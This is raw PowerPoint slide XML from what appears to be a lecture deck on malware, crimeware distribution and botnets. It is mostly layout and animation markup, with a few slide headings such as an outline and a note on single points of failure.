                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65A9F290-BE59-4728-A3D4-872B3545E0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3484" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Picture 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18AC528F-FE07-419D-9497-998DD8157C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512" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Picture 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A47DFC2-5CE7-4457-962C-53736972D7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8755" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="Picture 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4342A4-D1A6-4A64-9B89-0FC7590964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6287" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E916ECE-FE7C-4A60-BD03-433B3CF8CB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3720" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Picture 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC7E68B-C4AF-4C3F-A432-8A53D36B41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3649" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E65F3651-8E39-4D17-BF79-FE36B84ED1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9362" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Picture 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1576B0C6-B751-48D5-8275-937143988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4227" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="Group 75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3189287" y="5543089"/>
            <a:ext cx="5725886" cy="1214029"/>
            <a:chOff x="414979" y="3333623"/>
            <a:chExt cx="8263530" cy="1534811"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="414979" y="3333623"/>
              <a:ext cx="8263530" cy="1523216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">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8" name="Content Placeholder 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="514376" y="3399955"/>
              <a:ext cx="8118848" cy="146847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chemeClr val="bg1"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Problem: single point of failure</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buClr>
                  <a:schemeClr val="bg1"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Easy to locate and take down</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214739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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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2066"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2066"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2066"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="206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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="5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xit" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="79" presetID="42" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="42" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="92" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="93" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2067"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2067"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2067"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2067"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="5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in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="5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958511"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831850" y="2668249"/>
            <a:ext cx="10515600" cy="3421401"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Malware and Crimeware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Crimeware Distribution, Exploit as a Service, Pay per Install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Botnets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
